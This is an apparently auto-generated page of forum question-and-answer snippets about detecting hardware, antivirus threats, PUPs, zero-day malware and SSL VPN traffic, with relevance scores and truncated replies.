Sufijo DNS espec¡fico para la conexi¢n. . : interno.rqc.com
Descripci¢n . . . . . . . . . . . . . . . : Atheros AR9485WB-EG Wireless Network Adapter
Direcci¢n f¡sica. . . . . . . . . . . . . : 20-16-D8-7F-E5-96
DHCP habilitado . . . . . . . . . . . . . : s¡
Configuraci¢n autom*tica habilitada . . . : s¡
V¡nculo: direcci¢n IPv6 local. . . : fe80::e03f:b607:125b:db55%13(Preferido)
Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.0.75(Preferido)
M*scara d... Read more

Answer:IP detection

please do not report your post
it also mentioned in the report screen
Please use this form ONLY to request a Moderator in case of a problem. Reasons can include: requesting a thread be moved or closed, report advertising messages, and problematic (harassment, fighting, or rude) posts. This is not a method of requesting technical assistance! Thanks!Click to expand...

i have moved your thread to a post of its own - this avoids confusion with trying to deal with two problems for two different users
 

1 more replies
Relevance 63.96%
Question: Detection

Hi  a small business i do IT work for were hit with a Crypto virus zendrz file, its now removed and all data restored, im just wondering, whats the best AV or tool to detect and stop these infections before they get on to the system

More replies
Relevance 63.96%
Question: ram detection

i have a wipro pc that is dual core , windows xp starter edition , 1 gb ram , the bios detects 1024 mb of ram but windows says its only 512 mb.. what happened to the rest 512 mb?? please help

Answer:ram detection

as it been associated with your video card by the bios

1 more replies
Relevance 63.96%
Question: PUP detection

In certain reviews it's been pointed out that PUP detection is weak in Qihoo. What do you think?
 

Answer:PUP detection

Good joke
Qihoo is one of the best in detection (reviews are based on personal opinion and not all people like software from china, are fair with some products ... watch Softpedia and other untrusted sites)
 

5 more replies
Relevance 63.96%

An alarming trend seems to be showing up in a lot of security suites. Detection of zero-day threats is at an all time low. A zero-day threat is a piece of malware that is new enough that it has not yet been detected by an anti-malware company and thus they do not have a signature for it. Several high profile antivirus and anti-malware suites have failed this portion of testing ever since it was implemented in the Malware Geek standard test in September. The group includes Symantec's Norton Internet Security, McAfee Internet Security, avast! Antivirus, Avira Antivirus, Sunbelt's Vipre Internet Security, Dr. Web Security Space Pro, and Webroot SecureAnywhere. What is up? All of these well known and well respected security suites are lagging behind the times and are falling victim to unknown, silent malware. You would think that these well known companies would surely have some sort protection for those threats that they do not have a signature for. However, it is exactly the opposite. Are they just waiting for a bigger and more destructive piece of malware to come along before they do something about it? With hundreds of new pieces of malware released on a daily basis, you CANNOT rely solely upon signatures to catch everything.

>http://malware-geek.blogspot.com/2011/11/zero-day-detection-where-is-it.html
 

Answer:Zero-Day Detection . . . . Where is it?

Why are you getting your information from Malware Geek?
 

6 more replies
Relevance 63.96%
Question: SSL VPN detection

Ok, all you pro security nuts. How/(can) do you handle detecting SSL VPNs? For instance, using my SSL Explorer setup here at the house, I can easily punch a hole right through any proxy I've tried, allowing me to say browse the net unfiltered, upload files, download files, even create a bridged vpn connecting both networks. On one hand SSL VPNs are great for businesses to allow them to secure access to internal resources easily, but when turned around they pose a security nightmare because the traffic is inherently trusted. All you need is a browser and possibly java.

I've only thought of 2 solutions. First, a snort rule that looks for an abnormally large amount of traffic via a 443 session. The problem here is that your only able to catch it after the fact, and after X amount of data has already been transmitted. Only a few KB would be needed to say infect the host, so this isn't a good solution. Another that would work against my situation would be to look for unsigned certificates. Not even sure how to go about that, but I'll bet some way exists to do this on the fly. But then again, if I wanted to spend $30, I'm in the clear again. The other thing already in place is black listing, however, homebrews are not by nature, so again, fail.

Thoughts?
 

Answer:SSL VPN detection

just block all 443 traffic!

Seriously, I'll have to try that through an astaro box. I have used Astaro to successfully block anonymous web proxies and LogMeIn/GoToMyPC, etc. I haven't specifically tried an SSL VPN yet.
 

19 more replies
Relevance 63.96%
Question: HD Detection

Hi Guys.. A week ago bought a new 'Maxtor 250 Gig 7200rpm 16 mb cache' and have been trying to get com to recognise since then. This is how it goes.. Original setup . 2 x 120 Seagate Barracudas SATA.. 1 x 200 Gig WD. (Eide) those have been running fine for quite a while.. The Maxtor is also an Eide. I wont bore you with the details of getting it formatted other than using a Maxtor Diagnostic disk to achieve it. The problem is that it will recognise now and again and sometimes it will be listed in bios but when I continue to boot it disappears again. I have tried as Master as a single Eide (with the 2 sata's OS) and its just a hit or miss affair if it is recognised. On Friday I mangaged all 4 being recognised but after a while the Maxtor dissappeared then on reboot the WD goes as well. Have tried the master/Slave combinations, all Jumper combinations. First boot recognition (eide) all these processes have the same effect, there they are, there they are gone. At one stage I did manage to drag some data accross onto the Maxtor and all OK as far as that goes.Have run Diagnostic test again and it did find errors and was able to fix, (And on some occasions it could not find the drive at all although it was there prior to reboot). As far as I can see BIOS is up to date as board only 12 months old if that. So I have basically run out of ideas, any suggestions gratefully recieved.. Now whether this has anything to do with it I really dont know as it was there before I ... Read more

Answer:HD Detection

Have you tried another IDE cable? Have you verified all of the BIOS settings or cleared CMOS?
 

15 more replies
Relevance 63.96%
Question: no ide detection

ok i know there is a harddive in my computer but when it boots up and i go into bios. i try to detect it but it's not there. it detects the cd burner when its hooked up to the same place as the harddrive was , with th same cord also, it will detect cd burners and stuff but not harddrives. i've also tried differnt harddrives. also when i let it boot up it says no boot record on ide , cd , or floppy even though a mandrake 10.1 install cd is in the cd drive.
do i have to do something to make it detect the mandrake cd. it's searching for the boot record so maybe it doesn't want to see mandrake. but any help would be usefull.
Thanks.
 

Answer:no ide detection

Your IDE controller may be going bad. That is if you have actually set the jumpers on the hard drive correctly, honour the plug order for 80-wire cable and have set the computer to actually try to boot from the CD or floppy.

You should try with another bootable CD too in case the one you have is bad.
 

6 more replies
Relevance 63.96%

Hello,

I've installed ATA Center 1.7.2 and Ata Lightweight Gateway on my DC.
Everything installed correctly, I don't find any errors in both gateway and ata center logs.

The problem I have is that I can't seem to get any alerts. I've tried both logging in with one honeycomb account and listing a DNS zone.
In the the database I dont have any NTLM events.
Can someone help me?

THank you

More replies
Relevance 63.96%
Question: AV Detection

In PCMAG tests, sometimes tester tests the detected samples modifying them. And most of the AVs couldn't detect all modified samples. Guess this means those AVs are not flexible.

Some AVs could detect all the modified samples. Guess those AVs are flexible & good.

I read Bitdefender free review & it detected all the modified samples.
Fsecure couldn't detect all the modified samples.

He doesn't perform modified samples test in all the reviews, dont know why?

Which are the AVs that are flexible & detect the modified samples the same as the original?
 

Answer:AV Detection

Hello,

The reason a security product may not have detected a sample after modification is because it may have detected the sample via a hash checksum like MD5, SHA1 or SHA256. When the bytes in the executable are changed, the hash checksum will also change. Therefore, the vendor may have a signature for a sample, but then the sample modification will cause the hash checksum to change. If the vendor does not have that new hash checksum in their database for the modified copy, then it will not detect the sample.

BitDefender (as an example) may have detected the sample after modification because they had generic detections for those sample. For example, HEX. HEX detection (included for generic detection/heuristics) is where the bytes in the executable (or file, not just executable) are scanned. The product will look for a pattern in the bytes which it can detect and classify as a certain threat.

For generic detection, if the pattern is in any sample with the HEX then it will be detected. This means a change in the bytes won't remove the product from detecting it, unless they removed the bytes from the application which consisted of the pattern of bytes the AV product had been picking up.

Hope that helped.

Cheers.
 

5 more replies
Relevance 63.96%
Question: Usb Detection

Hi, I am having problem with my USB Ports. It can detect every old hardware that it has auto installed but recently it does not detect my new webcam and mp3 player when i plug them in. But the power is running perfectly alright. What should I do?

Answer:Usb Detection

do you mean you can plug your usb printer in ,turn it on and it works fine, turn it off and plug your mp3 player in to the same port and then turn it on and it will not be recognized. make sure these things are removed properly (safely remove hardware) and if they were not you may have to uninstall then re-install the software
for these devices.

5 more replies